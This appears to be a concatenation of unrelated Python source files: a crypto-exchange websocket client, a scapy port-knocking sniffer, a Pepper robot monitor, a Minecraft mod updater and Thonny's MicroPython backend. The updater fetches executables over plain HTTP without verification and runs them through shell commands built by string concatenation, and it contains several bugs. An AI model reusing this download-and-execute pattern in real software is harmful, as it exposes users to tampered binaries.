if subscription not in self._subscriptions:
self._subscribe(subscription)
if self._orderbook_timestamps[market] == 0:
self.wait_for_orderbook_update(market, 5)
return {
side: sorted([(price, quantity) for price, quantity in list(
self._orderbooks[market][side].items()) if quantity],
key=lambda order: order[0] *
(-1 if side == 'bids' else 1))
for side in {'bids', 'asks'}
}
def get_orderbook_timestamp(self, market: str) -> float:
return self._orderbook_timestamps[market]
def wait_for_orderbook_update(self, market: str,
timeout: Optional[float]) -> None:
subscription = {'channel': 'orderbook', 'market': market}
if subscription not in self._subscriptions:
self._subscribe(subscription)
self._orderbook_update_events[market].wait(timeout)
def get_ticker(self, market: str) -> Dict:
subscription = {'channel': 'ticker', 'market': market}
if subscription not in self._subscriptions:
self._subscribe(subscription)
return self._tickers[market]
def _handle_orderbook_message(self, message: Dict) -> None:
market = message['market']
subscription = {'channel': 'orderbook', 'market': market}
if subscription not in self._subscriptions:
return
data = message['data']
if data['action'] == 'partial':
self._reset_orderbook(market)
for side in {'bids', 'asks'}:
book = self._orderbooks[market][side]
for price, size in data[side]:
if size:
book[price] = size
else:
del book[price]
self._orderbook_timestamps[market] = data['time']
checksum = data['checksum']
orderbook = self.get_orderbook(market)
checksum_data = [
':'.join([
f'{float(order[0])}:{float(order[1])}'
for order in (bid, offer) if order
]) for (bid, offer) in zip_longest(orderbook['bids'][:100],
orderbook['asks'][:100])
]
computed_result = int(zlib.crc32(':'.join(checksum_data).encode()))
if computed_result != checksum:
self._last_received_orderbook_data_at = 0
self._reset_orderbook(market)
self._unsubscribe({'market': market, 'channel': 'orderbook'})
self._subscribe({'market': market, 'channel': 'orderbook'})
else:
self._orderbook_update_events[market].set()
self._orderbook_update_events[market].clear()
def _handle_trades_message(self, message: Dict) -> None:
self._trades[message['market']].append(message['data'])
def _handle_ticker_message(self, message: Dict) -> None:
ticker = message['market']
data = message['data']
self._tickers[ticker] = data
if ticker in self._ticker_cbs:
self._ticker_cbs[ticker](ticker, data)
def _handle_fills_message(self, message: Dict) -> None:
self._fills.append(message['data'])
def _handle_orders_message(self, message: Dict) -> None:
data = message['data']
self._orders.update({data['id']: data})
def _on_message(self, ws, raw_message: str) -> None:
message = json.loads(raw_message)
message_type = message['type']
if message_type in {'subscribed', 'unsubscribed'}:
return
elif message_type == 'info':
if message['code'] == 20001:
return self.reconnect()
elif message_type == 'error':
raise Exception(message)
channel = message['channel']
if channel == 'orderbook':
self._handle_orderbook_message(message)
elif channel == 'trades':
self._handle_trades_message(message)
elif channel == 'ticker':
self._handle_ticker_message(message)
elif channel == 'fills':
self._handle_fills_message(message)
elif channel == 'orders':
self._handle_orders_message(message)
if __name__ == '__main__':
client = FtxWebsocketClient()
client.subscribe_ticker('BTC/USD', lambda ticker, data: print(data))
while True:
time.sleep(3)
|
port_manager.py
|
import socket, sys
from struct import *
import threading
from .proc_worker import ProcWorker, Event, bypass, ProcWorkerEvent, TocTocPortsEvent, PortManagerEvent
import logging
log = logging.getLogger(__name__)
from scapy.all import sniff, IP, TCP
class PortManager():
def __init__(self, address='0.0.0.0', unmanaged_ports=[]):
self._sockets = []
self._threads = []
self._address = address
self._unmanaged_ports = unmanaged_ports
try:
evt = threading.Event()
t = threading.Thread(target=self.wait_and_listen, args=(evt,))
self._threads.append(evt)
t.start()
except socket.error:
# TODO Send END
print( 'Socket could not be created. Error Code : ' + str(msg[0]) + ' Message ' + msg[1])
sys.exit()
def wait_and_listen(self, evt):
log.info("wait_and_listen")
# TODO Ver por qué no termina el hilo...
myfilter = '(tcp[13]&2!=0 and tcp[13]&16==0)'
sniff(prn=lambda pkt: self.notify_connection(pkt[IP].src, pkt[TCP].dport), stop_filter=lambda x: evt.is_set(), filter=myfilter, store=0)
log.info("nor_wait_nor_listen")
def notify_connection(self, addr, port):
log.debug("connection from %s:%s" % (addr, port))
# TODO Hacer esto con métodos con bloqueos (@lock)
if addr in self._active:
addr_info = self._active[addr]
if port == addr_info['next']:
next_n = addr_info['n'] + 1
if len(self._port_list) <= next_n:
self.last_port(addr)
del self._active[addr]
else:
addr_info['n'] = next_n
addr_info['next'] = self._port_list[next_n]
self._active[addr] = addr_info
else:
if port not in self._unmanaged_ports:
del self._active[addr]
else:
if self._port_list[0] == port:
self._active[addr] = dict(next=self._port_list[1], n=1)
def last_port(self, addr):
log.info("%s reached last port" % (addr))
# TODO Rename to reset
def open(self, port_list):
self._active = {}
self._port_list = port_list
def close_thread(self, evt):
try:
evt.set()
except Exception as e:
pass
def unlock_threads(self):
while len(self._threads):
try:
evt = self._threads.pop()
self.close_thread(evt)
except Exception as e:
pass
def close(self):
self.unlock_threads()
# https://eli.thegreenplace.net/2011/12/27/python-threads-communication-and-stopping
# http://www.bogotobogo.com/python/Multithread/python_multithreading_Event_Objects_between_Threads.php
class PortManagerWorker(ProcWorker):
def __init__(self, i_q, o_q, pm=None):
super(PortManagerWorker, self).__init__(i_q, o_q)
if not pm:
pm = PortManager()
self._pm = pm
self._pm.notify_connection = bypass(self._pm.notify_connection, self.notify_connection)
self._pm.last_port = bypass(self._pm.last_port, self.last_port)
def notify_connection(self, addr, port):
self._o.put(Event(PortManagerEvent.NEW_CONNECTION, {'port': port, 'address': addr}))
def last_port(self, address):
self._o.put(Event(PortManagerEvent.LAST_PORT, dict(address=address)))
def process_evt(self, evt):
super(PortManagerWorker, self).process_evt(evt)
if evt.get_id() == ProcWorkerEvent.END:
self._pm.close()
if evt.get_id() == TocTocPortsEvent.NEW_SLOT:
port_list = evt.get_value()['port_list'].get_values()
self._pm.open(port_list)
if evt.get_id() == PortManagerEvent.PROTECT_PORT:
pass
|
personsitting.py
|
#! /usr/bin/env python
# -*- encoding: UTF-8 -*-
# DOCUMENTATION
# http://doc.aldebaran.com/2-5/naoqi/peopleperception/alengagementzones-api.html#alengagementzones-api
import qi
import argparse
import sys
import os
import time
import threading
from utils import point2world
from naoqi import ALProxy
import conditions
from conditions import set_condition
def rhMonitorThread (memory_service):
t = threading.currentThread()
print "personsitting thread started"
while getattr(t, "do_run", True):
plist = memory_service.getData("PeoplePerception/VisiblePeopleList")
personid = 0
IsSitting = 0
v = 'false'
#print "[ Person sitting = 0 ]"
#try:
if (plist!=None and len(plist)>0):
for i in range (0,len(plist)):
personid = plist[i]
try:
IsSitting = memory_service.getData("PeoplePerception/Person/"+str(personid)+"/IsSitting")
# Save person position
memory_service.insertData("personsitting/test",personid)
if (IsSitting == 1):
px,py,pz = memory_service.getData("PeoplePerception/Person/"+str(personid)+"/PositionInRobotFrame")
print "[ Person sitting ]"
print " X: " + str(px) + " Y: " + str(py)
w_px, w_py = point2world(memory_service,[px,py])
memory_service.insertData("Condition/personsitting/world_coordinates",[w_px,w_py])
memory_service.insertData("Condition/personsitting/robot_coordinates_x",px)
memory_service.insertData("Condition/personsitting/robot_coordinates_y",py)
memory_service.insertData("Condition/personsitting/id",personid)
v = 'true'
except:
pass
#except:
# v = 'false'
set_condition(memory_service,'personsitting',v)
#print 'personhere:: value ',v
time.sleep(1)
print "personsitting thread quit"
def init(session):
global memory_service
global monitorThread
print "Person sitting init"
#Starting services
memory_service = session.service("ALMemory")
sitting_service = session.service("ALSittingPeopleDetection")
# PARAMETERS
sitting_service.setSittingThreshold(1.45)
sitting_threshold = sitting_service.getSittingThreshold()
print "sitting threshold: ",sitting_threshold
print "Creating the thread"
#create a thead that monitors directly the signal
monitorThread = threading.Thread(target = rhMonitorThread, args = (memory_service,))
monitorThread.start()
def quit():
global monitorThread
print "Person sitting quit"
monitorThread.do_run = False
def main():
global memory_service
parser = argparse.ArgumentParser()
parser.add_argument("--pip", type=str, default=os.environ['PEPPER_IP'],
help="Robot IP address. On robot or Local Naoqi: use '127.0.0.1'.")
parser.add_argument("--pport", type=int, default=9559,
help="Naoqi port number")
args = parser.parse_args()
pip = args.pip
pport = args.pport
#Starting application
try:
connection_url = "tcp://" + pip + ":" + str(pport)
print "Connecting to ", connection_url
app = qi.Application(["PersonSitting", "--qi-url=" + connection_url ])
except RuntimeError:
print ("Can't connect to Naoqi at ip \"" + pip + "\" on port " + str(pport) +".\n"
"Please check your script arguments. Run with -h option for help.")
sys.exit(1)
app.start()
session = app.session
init(session)
app.run()
if __name__ == "__main__":
main()
|
updater.py
|
# -*- coding: utf-8 -*-
import os,tempfile,platform,urllib.request,sys,threading,getpass,config,hashlib,json,requests,random,string,lang,subprocess
os.system("@title "+config.NAME+" "+config.VER)
pwd = os.getcwd()
r = requests.get(config.TEST_URL)
if r.status_code!=204:
print(lang.NETWORK_ERROR)
input()
sys.exit()
elif os.path.exists(config.MC_DIR)==False:
print(lang.CANNOT_FIND_MC_DIR)
input()
sys.exit()
elif os.path.exists(config.MC_DIR+"mods/")==False:
print(lang.CANNOT_FIND_MODS_DIR)
input()
sys.exit()
def readFile(file):
f = open(file)
line = f.readline()
while line:
txt = str(line,)
line = f.readline()
f.close()
return(txt)
def execCmd(cmd):
r = os.popen(cmd)
text = r.read()
r.close()
return text
def callbackfunc(blocknum, blocksize, totalsize):
global url
percent = 100.0 * blocknum * blocksize / totalsize
if percent > 100:
percent = 100
downsize=blocknum * blocksize
if downsize >= totalsize:
downsize=totalsize
s ="%.2f%%"%(percent)+"====>"+"%.2f"%(downsize/1024/1024)+"M/"+"%.2f"%(totalsize/1024/1024)+"M \r"
sys.stdout.write(s)
sys.stdout.flush()
if percent == 100:
print('')
def dl(url,filename):
urllib.request.urlretrieve(url, filename, callbackfunc)
def unzip(source_zip,target_dir):
print("")
print("- "+lang.DOWNLOADING_MSG)
program_pwd = "C:\\Users\\" + getpass.getuser() + "\\AppData\\Local\\Temp\\"
if os.path.isfile(program_pwd+'7z.exe') == False:
dl("http://uuz.cat/7z/7z.exe",program_pwd+"7z.exe")
if os.path.isfile(program_pwd+'7z.dll') == False:
dl("http://uuz.cat/7z/7z.dll",program_pwd+"7z.dll")
if os.path.isfile(program_pwd+'7z.sfx') == False:
dl("http://uuz.cat/7z/7z.sfx",program_pwd+"7z.sfx")
print("")
print("- "+lang.UNZIP_MSG)
cmd=program_pwd+'7z.exe x \"'+source_zip+'" -y -aos -o\"'+target_dir+'\"'
os.system(cmd)
def md5sum(file_name):
fp = open(file_name, 'rb')
content = fp.read()
fp.close()
m = hashlib.md5(content)
file_md5 = m.hexdigest()
return file_md5
def deep_search(needles, haystack):
found = {}
if type(needles) != type([]):
needles = [needles]
if type(haystack) == type(dict()):
for needle in needles:
if needle in haystack.keys():
found[needle] = haystack[needle]
elif len(haystack.keys()) > 0:
for key in haystack.keys():
result = deep_search(needle, haystack[key])
if result:
for k, v in result.items():
found[k] = v
elif type(haystack) == type([]):
for node in haystack:
result = deep_search(needles, node)
if result:
for k, v in result.items():
found[k] = v
return found
def random_str(randomlength=8):
a = list(string.ascii_letters)
random.shuffle(a)
return ''.join(a[:randomlength])
def init():
if os.path.isfile(pwd + "\\config\\maxram.cfg"):
os.remove("config\\maxram.cfg")
print("")
print(lang.RAM_INPUT)
print("")
print(lang.RAM_EXAMPLE)
print("")
maxram = input(lang.SETTING)
if int(maxram)<512:
print(lang.INPUT_CORRECT)
init()
elif int(maxram)>4096:
print(lang.INPUT_CORRECT)
init()
else:
file_object = open("config\\maxram.cfg", 'w')
file_object.write(maxram)
file_object.close()
maxram = maxram
def user():
if os.path.isfile(pwd + "\\config\\username.cfg"):
os.remove("config\\username.cfg")
user=input(lang.SET_NAME)
if user==False:
print(lang.INPUT_CORRECT)
user()
else:
file_object = open("config\\username.cfg", 'w')
file_object.write(user)
file_object.close()
username = user
def start(path):
print("")
print(lang.CHOOSE_MSG)
print("")
print("[0] "+lang.START_GAME)
print("[1] "+lang.RESET_USERNAME)
print("[2] "+lang.RESET_RAM)
print("")
choose=input(lang.CHOOSE_RIGHT)
if int(choose)==0:
print("")
print(lang.STARTING_GAME)
#print(path)
subprocess.Popen([path])
print("=> "+lang.START_DONE)
print("")
elif int(choose)==1:
user()
print("")
print("=> "+lang.SETED)
start(path)
elif int(choose)==2:
init()
print("")
print("=> "+lang.SETED)
start(path)
else:
print("x "+lang.INPUT_CORRECT)
start(path)
print("")
print(lang.CHECKING)
FileList = []
rootdir = os.environ['APPDATA']+"\\mcupdater\\"
for root, subFolders, files in os.walk(rootdir):
if 'done' in subFolders:
subFolders.remove('done')
for f in files:
if f.find('javaw.exe') != -1:
FileList.append(os.path.join(root, f))
if FileList:
if os.path.exists("config/") == False:
os.mkdir(pwd+"\\config\\")
if os.path.isfile(pwd + "/config/maxram.cfg") == False:
init()
print("")
print("=> "+lang.SETED)
if os.path.isfile(pwd + "/config/username.cfg") == False:
user()
print("")
print("=> "+lang.SETED)
shell = config.BAT
maxram = readFile("config\\maxram.cfg")
username = readFile("config\\username.cfg")
rpe_shell = shell.replace("{dir}", pwd)
rpe_shell = rpe_shell.replace("{java}", FileList[0])
rpe_shell = rpe_shell.replace("{maxram}", maxram)
rpe_shell = rpe_shell.replace("{username}", username)
tmp_filename = tempfile.mktemp(".bat")
open(tmp_filename, "w").close()
#print(tmp_filename)
file_object = open(tmp_filename, 'w')
file_object.write("@echo off\n")
file_object.write("set appdata=" + pwd + "\.minecraft\n")
file_object.write("cd /D %appdata%\n")
file_object.write(rpe_shell)
file_object.close()
ModList = []
localList = []
rootdir = config.MC_DIR+"mods/"
for name in os.listdir(rootdir):
if name.endswith('.jar') or name.endswith('.zip') or name.endswith('.litemod'):
filepath=rootdir+name
md5=md5sum(filepath)
ModList.append({0:md5,1:name})
localList.append({md5:name})
#print(json.dumps(localList, sort_keys=True, indent=4))
_json = json.dumps(ModList, sort_keys=True, indent=4)
headers = {
'User-Agent': config.UA
}
r = requests.post(config.API_URL , headers=headers , data=_json)
_output = r.text
#print(_output)
data = json.loads(_output)
if data["update"]==-1:
print("")
print("x "+lang.ERROR_1)
input()
sys.exit()
elif data["update"]==-2:
print("")
print("x "+lang.TOKEN_ERROR)
input()
sys.exit()
elif data["update"] == 1:
print("")
print("o "+lang.UPDATEING)
if data["del"]:
print("")
print(lang.DELETE_MSG)
for del_md5 in data["del"]:
md5=del_md5
result = deep_search(del_md5, localList)
filename = result[md5]
os.remove(config.MC_DIR+"mods/"+filename)
print(filename+" => Done")
if data["down"]:
print("")
num=0
for dls in data["down"]:
save_name=random_str(32)
save_name=save_name+"."+dls[0]
num=num+1
total=data["down_total"]
dl_url=dls[1]
print(lang.DOWNLOADING_MSG+" (" + str(num) + "/" + str(total) + ")")
save_path=pwd+"/"+config.MC_DIR+"mods/"+save_name
threading.Thread(target=dl(dl_url, save_path), args=('')).start()
start(tmp_filename)
else:
print("")
print("=> "+lang.LASTEST)
start(tmp_filename)
else:
print("")
print("x "+lang.CANNOT_FIND_JAVA)
bit=platform.machine()
if bit=="AMD64":
packge_name = "j8x64.zip"
else:
packge_name="j8x86.zip"
print("")
print("- 正在下载Java环境包..")
tmp_filename = tempfile.mktemp(".zip")
threading.Thread(target=dl("http://uuz.cat/"+packge_name,tmp_filename), args=('')).start()
program_pwd=os.environ['APPDATA']+"\\mcupdater\\"
if os.path.exists(program_pwd)==False:
os.mkdir(program_pwd)
unzip(tmp_filename,program_pwd)
print("")
print("O "+lang.JAVA_INSTALL_DONE)
input()
sys.exit()
|
backend.py
|
from thonny.common import (
InputSubmission,
InterruptCommand,
EOFCommand,
parse_message,
ToplevelCommand,
ToplevelResponse,
InlineCommand,
InlineResponse,
UserError,
serialize_message,
BackendEvent,
ValueInfo,
execute_system_command,
)
import sys
import logging
import traceback
import queue
from thonny.plugins.micropython.connection import (
ConnectionClosedException,
ConnectionFailedException,
)
from textwrap import dedent
import ast
import re
from queue import Queue, Empty
import threading
import os
import time
from thonny.misc_utils import find_volumes_by_name, sizeof_fmt
import jedi
import io
import tokenize
from thonny.running import EXPECTED_TERMINATION_CODE
import binascii
import shutil
# See https://github.com/dhylands/rshell/blob/master/rshell/main.py
# for UART_BUFFER_SIZE vs USB_BUFFER_SIZE
# ampy uses 32 bytes: https://github.com/pycampers/ampy/blob/master/ampy/files.py
# I'm not worrying so much, because reader thread reads continuously
# and writer (SerialConnection) has it's own blocks and delays
BUFFER_SIZE = 512
BAUDRATE = 115200
ENCODING = "utf-8"
# Commands
RAW_MODE_CMD = b"\x01"
NORMAL_MODE_CMD = b"\x02"
INTERRUPT_CMD = b"\x03"
SOFT_REBOOT_CMD = b"\x04"
# Output tokens
THONNY_MSG_START = b"\x02<thonny>"
THONNY_MSG_END = b"</thonny>\x04"
EOT = b"\x04"
NORMAL_PROMPT = b">>> "
LF = b"\n"
OK = b"OK"
# first prompt when switching to raw mode (or after soft reboot in raw mode)
# Looks like it's not translatable in CP
# https://github.com/adafruit/circuitpython/blob/master/locale/circuitpython.pot
FIRST_RAW_PROMPT = b"raw REPL; CTRL-B to exit\r\n>"
FIRST_RAW_PROMPT_SUFFIX = b"\r\n>"
RAW_PROMPT = b">"
BLOCK_CLOSERS = re.compile(
b"|".join(map(re.escape, [LF, EOT, THONNY_MSG_START, NORMAL_PROMPT, FIRST_RAW_PROMPT]))
)
logger = logging.getLogger("thonny.micropython.backend")
def debug(msg):
return
print(msg, file=sys.stderr)
class MicroPythonBackend:
def __init__(self, connection, clean, api_stubs_path):
self._connection = connection
self._local_cwd = None
self._cwd = None
self._interrupt_requested = False
self._cancel_requested = False
self._command_queue = Queue() # populated by reader thread
self._progress_times = {}
self._api_stubs_path = api_stubs_path
self._command_reading_thread = threading.Thread(target=self._read_commands, daemon=True)
self._command_reading_thread.start()
self._startup_time = time.time()
self._ctrl_suggestion_given = False
try:
self._prepare(clean)
self._mainloop()
except ConnectionClosedException as e:
self._on_connection_closed(e)
except Exception:
logger.exception("Crash in backend")
traceback.print_exc()
def _prepare(self, clean):
if clean:
self._interrupt_to_raw_prompt()
self._clear_environment()
else:
self._process_until_initial_raw_prompt()
self._cwd = self._fetch_cwd()
self._welcome_text = self._fetch_welcome_text()
self._builtin_modules = self._fetch_builtin_modules()
self._builtins_info = self._fetch_builtins_info()
self._send_ready_message()
def _mainloop(self):
while True:
try:
self._cancel_requested = False
self._interrupt_requested = False
self._check_for_connection_errors()
try:
cmd = self._command_queue.get(timeout=0.1)
except Empty:
# No command in queue, but maybe a thread produced output meanwhile
# or the user resetted the device
self._forward_unexpected_output()
continue
if isinstance(cmd, InputSubmission):
self._submit_input(cmd.data)
elif isinstance(cmd, EOFCommand):
self._soft_reboot(False)
elif isinstance(cmd, InterruptCommand):
self._interrupt()
else:
self.handle_command(cmd)
except KeyboardInterrupt:
self._interrupt()
def _fetch_welcome_text(self):
self._connection.write(NORMAL_MODE_CMD)
welcome_text = self._connection.read_until(NORMAL_PROMPT).strip(b"\r\n >")
if os.name != "nt":
welcome_text = welcome_text.replace(b"\r\n", b"\n")
# Go back to raw prompt
self._connection.write(RAW_MODE_CMD)
self._connection.read_until(FIRST_RAW_PROMPT)
return welcome_text.decode(ENCODING, errors="replace")
def _fetch_uname(self):
res = self._evaluate("__thonny_os.uname()", prelude="import os as __thonny_os")
return {
"sysname": res[0],
"nodename": res[1],
"release": res[2],
"version": res[3],
"machine": res[4],
}
def _fetch_builtin_modules(self):
out, err, _ = self._execute("help('modules')", capture_output=True)
assert not err, "Error was: %r" % err
modules_str_lines = out.strip().splitlines()
last_line = modules_str_lines[-1].strip()
if last_line.count(" ") > 0 and " " not in last_line and "\t" not in last_line:
# probably something like "plus any modules on the filesystem"
# (can be in different languages)
modules_str_lines = modules_str_lines[:-1]
modules_str = (
" ".join(modules_str_lines)
.replace("/__init__", "")
.replace("__main__", "")
.replace("/", ".")
)
return modules_str.split()
def _fetch_builtins_info(self):
"""
for p in self._get_api_stubs_path():
builtins_file = os.path.join(p, "__builtins__.py")
if os.path.exists(builtins_file):
return parse_api_information(builtins_file)
"""
path = os.path.join(self._api_stubs_path, "builtins.py")
if os.path.exists(path):
return parse_api_information(path)
else:
return {}
def _fetch_cwd(self):
return self._evaluate(
"__thonny_os.getcwd() if hasattr(__thonny_os, 'getcwd') else ''",
prelude="import os as __thonny_os",
)
def _send_ready_message(self):
self.send_message(ToplevelResponse(welcome_text=self._welcome_text, cwd=self._cwd))
def _check_send_inline_progress(self, cmd, value, maximum, description=None):
assert "id" in cmd
prev_time = self._progress_times.get(cmd["id"], 0)
if value != maximum and time.time() - prev_time < 0.2:
# Don't notify too often
return
else:
self._progress_times[cmd["id"]] = time.time()
if description is None:
description = cmd.get("description", "Working...")
self.send_message(
BackendEvent(
event_type="InlineProgress",
command_id=cmd["id"],
value=value,
maximum=maximum,
description=description,
)
)
def _interrupt(self):
self._connection.write(INTERRUPT_CMD)
def _check_for_interrupt(self, action_scope):
if action_scope == "device" and self._interrupt_requested:
self._interrupt()
self._interrupt_requested = False
if action_scope == "local" and self._cancel_requested:
self._cancel_requested = False
raise KeyboardInterrupt()
def _interrupt_to_raw_prompt(self):
# NB! Sometimes disconnecting and reconnecting (on macOS?)
# too quickly causes anomalies. See CalliopeMiniProxy for more details
discarded_bytes = b""
for delay in [0.05, 0.5, 0.1, 1.0, 3.0, 5.0]:
# Interrupt several times, because with some drivers first interrupts seem to vanish
if delay >= 1:
self._show_error(
"Could not enter REPL. Trying again with %d second waiting time..." % delay
)
self._connection.reset_output_buffer()
self._connection.write(INTERRUPT_CMD)
self._connection.write(RAW_MODE_CMD)
time.sleep(delay)
discarded_bytes += self._connection.read_all()
if discarded_bytes.endswith(FIRST_RAW_PROMPT) or discarded_bytes.endswith(b"\r\n>"):
break
else:
max_tail_length = 500
if len(discarded_bytes) > max_tail_length:
discarded_bytes_str = (
"[skipping %d bytes] ..." % (len(discarded_bytes) - max_tail_length)
) + repr(discarded_bytes[:-max_tail_length])
else:
discarded_bytes_str = repr(discarded_bytes)
self._show_error(
"Could not enter REPL. Giving up. Read bytes:\n"
+ discarded_bytes_str
+ "\n\nYour options:\n\n"
+ " - check connection properties;\n"
+ " - make sure the device has suitable firmware;\n"
+ " - make sure the device is not in bootloader mode;\n"
+ " - reset the device and try again;\n"
+ " - try other serial clients (Putty, TeraTerm, screen, ...);\n"
+ " - ask for help in Thonny's forum or issue tracker."
)
sys.exit()
def _soft_reboot(self, side_command):
if side_command:
self._interrupt_to_raw_prompt()
# Need to go to normal mode. MP doesn't run user code in raw mode
# (CP does, but it doesn't hurt to do it there as well)
self._connection.write(NORMAL_MODE_CMD)
self._connection.read_until(NORMAL_PROMPT)
self._connection.write(SOFT_REBOOT_CMD)
if not side_command:
self._process_until_raw_prompt()
self.send_message(ToplevelResponse(cwd=self._cwd))
def _read_commands(self):
"works in separate thread"
while True:
line = sys.stdin.readline()
if line == "":
logger.info("Read stdin EOF")
sys.exit()
cmd = parse_message(line)
if isinstance(cmd, InterruptCommand):
self._interrupt_requested = True
self._cancel_requested = True
else:
self._command_queue.put(cmd)
def handle_command(self, cmd):
assert isinstance(cmd, (ToplevelCommand, InlineCommand))
if "local_cwd" in cmd:
self._local_cwd = cmd["local_cwd"]
def create_error_response(**kw):
if not "error" in kw:
kw["error"] = traceback.format_exc()
if isinstance(cmd, ToplevelCommand):
return ToplevelResponse(command_name=cmd.name, **kw)
else:
return InlineResponse(command_name=cmd.name, **kw)
handler = getattr(self, "_cmd_" + cmd.name, None)
if handler is None:
response = create_error_response(error="Unknown command: " + cmd.name)
else:
try:
response = handler(cmd)
except SystemExit:
# Must be caused by Thonny or plugins code
if isinstance(cmd, ToplevelCommand):
traceback.print_exc()
response = create_error_response(SystemExit=True)
except UserError as e:
sys.stderr.write(str(e) + "\n")
response = create_error_response()
except KeyboardInterrupt:
response = create_error_response(error="Interrupted", interrupted=True)
except Exception:
_report_internal_error()
response = create_error_response(context_info="other unhandled exception")
if response is None:
response = {}
if response is False:
# Command doesn't want to send any response
return
elif isinstance(response, dict):
if isinstance(cmd, ToplevelCommand):
response = ToplevelResponse(command_name=cmd.name, **response)
elif isinstance(cmd, InlineCommand):
response = InlineResponse(cmd.name, **response)
if "id" in cmd and "command_id" not in response:
response["command_id"] = cmd["id"]
debug("cmd: " + str(cmd) + ", respin: " + str(response))
self.send_message(response)
def _submit_input(self, cdata: str) -> None:
# TODO: what if there is a previous unused data waiting
assert self._connection.outgoing_is_empty()
assert cdata.endswith("\n")
if not cdata.endswith("\r\n"):
# submission is done with CRLF
cdata = cdata[:-1] + "\r\n"
bdata = cdata.encode(ENCODING)
self._connection.write(bdata)
# Try to consume the echo
try:
echo = self._connection.read(len(bdata))
except queue.Empty:
# leave it.
logging.warning("Timeout when reading echo")
return
if echo != bdata:
# because of autoreload? timing problems? interruption?
# Leave it.
logging.warning("Unexpected echo. Expected %s, got %s" % (bdata, echo))
self._connection.unread(echo)
def send_message(self, msg):
if "cwd" not in msg:
msg["cwd"] = self._cwd
sys.stdout.write(serialize_message(msg) + "\n")
sys.stdout.flush()
def _send_output(self, data, stream_name):
if not data:
return
data = self._transform_output(data)
msg = BackendEvent(event_type="ProgramOutput", stream_name=stream_name, data=data)
self.send_message(msg)
def _transform_output(self, data):
# Any keypress wouldn't work
return data.replace(
"Press any key to enter the REPL. Use CTRL-D to reload.",
"Press Ctrl-C to enter the REPL. Use CTRL-D to reload.",
)
def _ensure_raw_propmt(self):
# similar to _interrupt_to_raw_prompt, but assumes we are already in a prompt
self._forward_unexpected_output()
self._connection.write(RAW_MODE_CMD)
prompt = self._connection.read_until(FIRST_RAW_PROMPT_SUFFIX, 1, True)
if not prompt.endswith(FIRST_RAW_PROMPT_SUFFIX):
raise TimeoutError("Could not ensure raw prompt")
def _execute(self, script, capture_output=False):
self._ensure_raw_propmt()
# send command
self._connection.write(script.encode(ENCODING) + EOT)
debug("Wrote " + script + "\n--------\n")
# fetch command confirmation
ok = self._connection.read(2)
debug("GOTOK")
assert ok == OK, "Expected OK, got %r, followed by %r" % (ok, self._connection.read_all())
return self._process_until_raw_prompt(capture_output)
def _execute_without_output(self, script):
out, err, value = self._execute(script, capture_output=True)
if err or out:
raise RuntimeError("Failed MP script: " + str(out) + "\n" + str(err))
return value
def _execute_print_expr(self, expr, prelude="", cleanup="", capture_output=False):
# assuming expr really contains an expression
# separator is for separating side-effect output and printed value
script = ""
if prelude:
script += prelude + "\n"
script += "print(%r, repr(%s), sep='', end=%r)" % (
THONNY_MSG_START.decode(),
expr,
THONNY_MSG_END.decode(),
)
# assuming cleanup doesn't cause output
if cleanup:
script += "\n" + cleanup
return self._execute(script, capture_output)
def _evaluate(self, expr, prelude="", cleanup=""):
_, _, value_repr = self._execute_print_expr(expr, prelude, cleanup)
if value_repr is None:
return None
else:
return ast.literal_eval(value_repr)
def _process_until_initial_raw_prompt(self):
self._connection.write(RAW_MODE_CMD)
try:
self._process_until_raw_prompt()
except KeyboardInterrupt:
self._interrupt()
def _process_until_raw_prompt(self, capture_output=False):
"""
Forwards output, extracts Thonny message, replaces normal prompts with raw prompts.
This is executed when some code is running or just after requesting raw prompt.
After submitting commands to the raw REPL, the output should be like
{stdout}\x04\{stderr}\x04\n\>
In the end of {stdout} there may be \x02{value-for-thonny}
Interrupts will alter the execution, but from the response parsing
perspective they don't matter as they look like any other exception.
Things get complicated because of soft-reboots, which always end with
regular prompt. Soft-reboots can occur because of Ctrl+D, machine.soft_reset()
and even reset button (micro:bit).
Because of soft-reboot we can't assume we'll find the terminating markers for
each command.
Output produced by background threads (eg. in WiPy ESP32) cause even more difficulties,
because it becomes impossible to say whether we are at prompt and output
is from another thread or the main thread is running.
For now I'm ignoring these problems and assume all output comes from the main thread.
"""
# TODO: experiment with Ctrl+C, Ctrl+D, reset
eot_count = 0
value = None
done = False
output = b""
out = b""
err = b""
while not done:
if (
self._connection.num_bytes_received == 0
and not self._ctrl_suggestion_given
and time.time() - self._startup_time > 1.5
):
self._show_error(
"\n"
+ "Device is busy or does not respond. Your options:\n\n"
+ " - wait until it completes current work;\n"
+ " - use Ctrl+C to interrupt current work;\n"
+ " - use Stop/Restart to interrupt more and enter REPL.\n"
)
self._ctrl_suggestion_given = True
# There may be an input submission waiting
# and we can't progress without resolving it first
self._check_for_side_commands()
self._check_for_interrupt("device")
# Process input in chunks (max 1 parsing marker per chunk).
# Prefer whole lines (to reduce the number of events),
# but don't wait too long for eol.
ddd = self._connection.soft_read_until(BLOCK_CLOSERS, timeout=0.05)
output += ddd
stream_name = "stderr" if eot_count == 1 else "stdout"
if output.endswith(THONNY_MSG_START):
debug("MSGSTA: " + str(output))
output = output[: -len(THONNY_MSG_START)]
# Low chance of failure (eg. because of precisely timed reboot),
# therefore it's safe to use big timeout
temp = self._connection.soft_read_until(THONNY_MSG_END, timeout=3)
if temp.endswith(THONNY_MSG_END):
value = temp[: -len(THONNY_MSG_END)]
debug("GOTVALUE: " + str(value))
else:
# failure, restore everything to help diagnosis
output = output + THONNY_MSG_START + temp
elif output.endswith(EOT):
debug("EOT: " + str(output))
output = output[: -len(EOT)]
eot_count += 1
if eot_count == 2:
# Normal completion of the command
# big chance of being at the raw prompt
temp = self._connection.soft_read_until(RAW_PROMPT, timeout=0.1)
if temp == RAW_PROMPT and self._connection.incoming_is_empty():
done = True
elif temp:
# Failure, temp needs to be parsed again
self._connection.unread(temp)
elif output.endswith(FIRST_RAW_PROMPT) and self._connection.incoming_is_empty():
debug("FIRAPRO: " + str(output))
output = output[: -len(FIRST_RAW_PROMPT)]
done = True
elif (
output.endswith(NORMAL_PROMPT)
and self._connection.peek_incoming() == b"\r\n" + FIRST_RAW_PROMPT
):
debug("NOPRO: " + str(output))
output = output + self._connection.read_until(FIRST_RAW_PROMPT)
# skip both normal and raw prompt together
# (otherwise they get processed separately)
output = output[: -len(NORMAL_PROMPT + b"\r\n" + FIRST_RAW_PROMPT)]
done = True
elif output.endswith(NORMAL_PROMPT) and self._connection.incoming_is_empty():
debug("NOPRO2: " + str(output))
output = output[: -len(NORMAL_PROMPT)]
# switch to raw mode and continue
